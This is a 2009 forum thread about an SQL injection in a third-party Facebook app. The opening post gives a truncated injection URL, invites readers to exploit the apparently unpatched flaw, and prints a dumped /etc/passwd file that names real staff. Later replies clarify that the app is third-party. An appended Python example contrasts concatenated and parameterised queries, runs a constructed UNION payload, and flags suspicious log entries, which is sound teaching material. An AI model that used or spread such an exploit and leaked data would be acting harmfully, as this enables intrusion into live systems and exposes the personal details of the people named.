September 16th, 2009, 10:48 AM
#1
Facebook SQL Injection
***t34b4g5's Edit: I am allowing this thread to remain, see post below***
I'm not sure if I'm allowed to post this here; if this is against the rules, just remove the thread.
A team member discovered this a few weeks ago and it still seems to be unpatched.
Be my guest and play a little with them; a site as big as Facebook should be aware of security. Hopefully their box is hardened.
***Click at your own Risk***
http://apps.facebook.com/newscloud/?...737764%29,10--
***Click at your own Risk***
Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
user:x:1000:1000:user,,,:/home/user:/bin/bash
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
todd:x:1001:1001:Todd Weaver,,,:/home/todd:/bin/bash
jeff:x:1002:1002:Jeff Reifman,,,:/home/jeff:/bin/bash
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:102:104::/var/spool/exim4:/bin/false
statd:x:103:65534::/var/lib/nfs:/bin/false
identd:x:104:65534::/var/run/identd:/bin/false
adam:x:1003:1003:Adam Faja,,,:/home/adam:/bin/bash
rick:x:1004:1004:Rick Kowal,,,:/home/rick:/bin/bash
russell:x:1005:1005:Russell Branca,,,:/home/russell:/bin/bash
daniel:x:1006:1006:Daniel MacDonald,,,:/home/daniel:/bin/bash
postfix:x:105:106::/var/spool/postfix:/bin/false
Last edited by t34b4g5; September 16th, 2009 at 11:38 AM.
silent play in the shadow of power...
-
September 16th, 2009, 11:35 AM
#2
-
September 18th, 2009, 06:18 PM
#3
Actually, what you've found is an injection in a third-party app on Facebook:
http://developers.facebook.com/
apps.facebook.com is the domain name, but that's not their data.
-
September 18th, 2009, 10:44 PM
#4
Considering what the third-party app is (newscloud), it doesn't really surprise me.
If I remember correctly (it's been a while since I looked at it), there is a problem with the Facebook API that allows any member to post their own information. Instead of setting it up like the members are contributors, it is set up like they are members, so they "need" direct access to the database. Even if Facebook fixed the problem, I'm sure a lot of developers didn't do it right. You can probably get the same type of results from most apps that allow people to submit their own content on Facebook.
"Ignorance is bliss....
but only for your enemy"
-- souleman
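The posts above describe the two sides of this: a third-party app that splices a URL parameter straight into SQL (so the `)` and `,10--` tail in the linked URL becomes part of the statement), and app developers who were handed direct database access and "didn't do it right". The following is an added example, not code from the thread or from the newscloud app. It builds a throwaway in-memory SQLite database, shows the vulnerable concatenation beside a parameterised version that rejects anything but a plain integer, and scans a few constructed log lines for integer-only parameters carrying non-numeric values. The parameter name `id`, the `items`/`secrets` tables, the `METHOD PATH STATUS` log format and all sample data are assumptions made for the example; the thread's real URL is truncated and its parameter name is not known.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for a third-party app's database: the app is meant to
# serve rows from `items`; `secrets` holds data it should never expose.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE secrets (id INTEGER PRIMARY KEY, value TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(1, "First story"), (2, "Second story")])
    conn.execute("INSERT INTO secrets VALUES (1, 'constructed secret, not real data')")
    return conn


def fetch_item_vulnerable(conn, item_id):
    """Vulnerable pattern: the raw query-string value is concatenated into SQL,
    so whoever controls the value controls the rest of the statement."""
    sql = "SELECT title FROM items WHERE id = " + str(item_id)
    return [row[0] for row in conn.execute(sql)]


def fetch_item_safe(conn, item_id):
    """Hardened pattern: reject anything that is not a plain integer, then bind
    the value as a parameter so it is only ever compared, never parsed as SQL."""
    if not re.fullmatch(r"[0-9]+", str(item_id)):
        raise ValueError("id must be a plain integer")
    return [row[0] for row in
            conn.execute("SELECT title FROM items WHERE id = ?", (int(item_id),))]


# Assumption: the query parameters the app documents as integer-only.
INT_ONLY_PARAMS = {"id"}


def flag_requests(log_lines):
    """Scan minimal 'METHOD PATH STATUS' log lines (constructed format) and
    return (line_no, param, decoded_value) for every integer-only parameter
    whose percent-decoded value is not a plain integer. Characters such as
    ')', ',' and '--' in such a value are what a defender wants to see flagged."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        parts = line.split()
        if len(parts) != 3:
            continue  # not in the constructed log format; skip the line
        _method, path, _status = parts
        params = parse_qs(urlsplit(path).query)  # percent-decodes the values
        for name in INT_ONLY_PARAMS:
            for value in params.get(name, []):
                if not re.fullmatch(r"[0-9]+", value):
                    hits.append((line_no, name, value))
    return hits


# Constructed log lines; the second only mimics the shape of the thread's URL
# (a ')' and ',10--' tail after the numeric id), it is not the real request.
SAMPLE_LOG = [
    "GET /newscloud/?id=12 200",
    "GET /newscloud/?id=12%29%2C10-- 200",
    "GET /newscloud/?id=7 200",
]


if __name__ == "__main__":
    db = make_db()
    payload = "1 UNION SELECT value FROM secrets --"  # constructed illustration
    print("vulnerable:", fetch_item_vulnerable(db, payload))
    try:
        fetch_item_safe(db, payload)
    except ValueError as exc:
        print("safe:", exc)
    print("flagged:", flag_requests(SAMPLE_LOG))
```

The same input that makes the concatenated query return rows from a second table is rejected by the hardened function before any SQL runs, and the log scan surfaces the request without knowing anything about the SQL dialect, because it checks the value against what the parameter is supposed to be rather than against a list of attack strings.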